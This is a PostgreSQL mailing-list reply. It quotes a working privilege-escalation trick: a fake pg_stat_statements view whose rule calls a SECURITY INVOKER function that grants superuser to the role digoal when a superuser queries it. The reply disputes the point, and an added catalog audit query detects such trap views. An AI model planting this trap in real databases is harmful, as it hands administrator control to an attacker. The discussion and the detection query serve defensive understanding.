On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:
> A normal user gets super privilege, using a security invoker function.
> postgres=> create table pg_stat_statements (
> userid oid ,
> dbid oid ,
> queryid bigint ,
> query text ,
> calls bigint ,
> total_time double precision ,
> rows bigint ,
> shared_blks_hit bigint ,
> shared_blks_read bigint ,
> shared_blks_dirtied bigint ,
> shared_blks_written bigint ,
> local_blks_hit bigint ,
> local_blks_read bigint ,
> local_blks_dirtied bigint ,
> local_blks_written bigint ,
> temp_blks_read bigint ,
> temp_blks_written bigint ,
> blk_read_time double precision ,
> blk_write_time double precision );
>
> postgres=> create or replace function f() returns pg_stat_statements as $$
>
> declare
> begin
> alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> CREATE FUNCTION
>
> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> CREATE RULE
>
> When a superuser selects from the view pg_stat_statements, the normal user
> digoal will be granted the superuser role.
>
> Yes, it's a normal operation, but somebody can use this trick.
>
Everything you just wrote was done as superuser so what's your point?
David J.
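
An audit query for the pattern discussed in this thread, added here as an example and not written by either poster: it lists views whose "_RETURN" rule calls a SECURITY INVOKER function when the view or the function is owned by a non-superuser, which is what a superuser can check before selecting from an unfamiliar view. It uses only the standard system catalogs; the choice of columns and filters is an assumption of this example.

```sql
-- Added example: find views that would run a non-superuser's
-- SECURITY INVOKER function with the privileges of whoever selects
-- from the view.
SELECT vn.nspname            AS view_schema,
       c.relname             AS view_name,
       vo.rolname            AS view_owner,
       p.oid::regprocedure   AS called_function,
       fo.rolname            AS function_owner,
       l.lanname             AS function_language
FROM pg_class c
JOIN pg_namespace vn ON vn.oid = c.relnamespace
JOIN pg_roles vo     ON vo.oid = c.relowner
-- A view is a relation with an ON SELECT rule named "_RETURN".
JOIN pg_rewrite r    ON r.ev_class = c.oid
                    AND r.rulename = '_RETURN'
-- Functions referenced by the rule's query are recorded in pg_depend.
JOIN pg_depend d     ON d.classid    = 'pg_rewrite'::regclass
                    AND d.objid      = r.oid
                    AND d.refclassid = 'pg_proc'::regclass
JOIN pg_proc p       ON p.oid = d.refobjid
JOIN pg_namespace fn ON fn.oid = p.pronamespace
JOIN pg_roles fo     ON fo.oid = p.proowner
JOIN pg_language l   ON l.oid = p.prolang
WHERE c.relkind = 'v'
  -- SECURITY INVOKER: the body runs as the caller, not the owner.
  AND NOT p.prosecdef
  -- Either object can be changed by a role that is not a superuser.
  AND (NOT vo.rolsuper OR NOT fo.rolsuper)
  -- Skip built-in functions.
  AND fn.nspname <> 'pg_catalog'
ORDER BY view_schema, view_name, called_function;
```

Run it per database, since these catalogs are database-local; any row naming a relation that looks like a well-known monitoring view (such as pg_stat_statements here) but is owned by an ordinary role deserves a closer look at the function body.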